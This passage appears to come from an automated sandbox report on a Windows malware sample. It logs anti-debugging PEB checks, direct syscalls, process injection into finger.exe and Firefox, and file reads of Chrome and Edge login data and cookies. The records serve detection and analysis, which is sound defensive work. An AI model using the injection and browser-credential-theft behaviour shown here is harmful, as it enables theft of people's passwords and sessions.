                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B49D0 mov eax, dword ptr fs:[00000030h]6_2_011B49D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012169C0 mov eax, dword ptr fs:[00000030h]6_2_012169C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B29F9 mov eax, dword ptr fs:[00000030h]6_2_011B29F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B29F9 mov eax, dword ptr fs:[00000030h]6_2_011B29F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A9D3 mov eax, dword ptr fs:[00000030h]6_2_0124A9D3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122483A mov eax, dword ptr fs:[00000030h]6_2_0122483A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122483A mov eax, dword ptr fs:[00000030h]6_2_0122483A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA830 mov eax, dword ptr fs:[00000030h]6_2_011BA830
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov ecx, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C810 mov eax, dword ptr fs:[00000030h]6_2_0120C810
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184859 mov eax, dword ptr fs:[00000030h]6_2_01184859
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184859 mov eax, dword ptr fs:[00000030h]6_2_01184859
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0854 mov eax, dword ptr fs:[00000030h]6_2_011B0854
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216870 mov eax, dword ptr fs:[00000030h]6_2_01216870
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216870 mov eax, dword ptr fs:[00000030h]6_2_01216870
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E872 mov eax, dword ptr fs:[00000030h]6_2_0120E872
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E872 mov eax, dword ptr fs:[00000030h]6_2_0120E872
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01192840 mov ecx, dword ptr fs:[00000030h]6_2_01192840
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180887 mov eax, dword ptr fs:[00000030h]6_2_01180887
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C89D mov eax, dword ptr fs:[00000030h]6_2_0120C89D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A8E4 mov eax, dword ptr fs:[00000030h]6_2_0124A8E4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE8C0 mov eax, dword ptr fs:[00000030h]6_2_011AE8C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC8F9 mov eax, dword ptr fs:[00000030h]6_2_011BC8F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC8F9 mov eax, dword ptr fs:[00000030h]6_2_011BC8F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01248B28 mov eax, dword ptr fs:[00000030h]6_2_01248B28
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01248B28 mov eax, dword ptr fs:[00000030h]6_2_01248B28
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEB20 mov eax, dword ptr fs:[00000030h]6_2_011AEB20
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEB20 mov eax, dword ptr fs:[00000030h]6_2_011AEB20
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01228B42 mov eax, dword ptr fs:[00000030h]6_2_01228B42
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216B40 mov eax, dword ptr fs:[00000030h]6_2_01216B40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216B40 mov eax, dword ptr fs:[00000030h]6_2_01216B40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124AB40 mov eax, dword ptr fs:[00000030h]6_2_0124AB40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117CB7E mov eax, dword ptr fs:[00000030h]6_2_0117CB7E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122EB50 mov eax, dword ptr fs:[00000030h]6_2_0122EB50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190BBE mov eax, dword ptr fs:[00000030h]6_2_01190BBE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190BBE mov eax, dword ptr fs:[00000030h]6_2_01190BBE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120CBF0 mov eax, dword ptr fs:[00000030h]6_2_0120CBF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEBFC mov eax, dword ptr fs:[00000030h]6_2_011AEBFC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122EBD0 mov eax, dword ptr fs:[00000030h]6_2_0122EBD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA38 mov eax, dword ptr fs:[00000030h]6_2_011BCA38
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A4A35 mov eax, dword ptr fs:[00000030h]6_2_011A4A35
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A4A35 mov eax, dword ptr fs:[00000030h]6_2_011A4A35
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120CA11 mov eax, dword ptr fs:[00000030h]6_2_0120CA11
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEA2E mov eax, dword ptr fs:[00000030h]6_2_011AEA2E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA24 mov eax, dword ptr fs:[00000030h]6_2_011BCA24
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190A5B mov eax, dword ptr fs:[00000030h]6_2_01190A5B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190A5B mov eax, dword ptr fs:[00000030h]6_2_01190A5B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_0122EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011FCA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011BCA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011B8A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01254A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01188AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011D6AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01180AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011B4AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011D6ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011BAAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01208D20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_011B4D1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01176D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_0119AD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01238D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01180D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: 6_2_01188D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Memory written: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Thread register set: target process: 5828
                Source: C:\Windows\SysWOW64\finger.exe Thread APC queued: target process: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
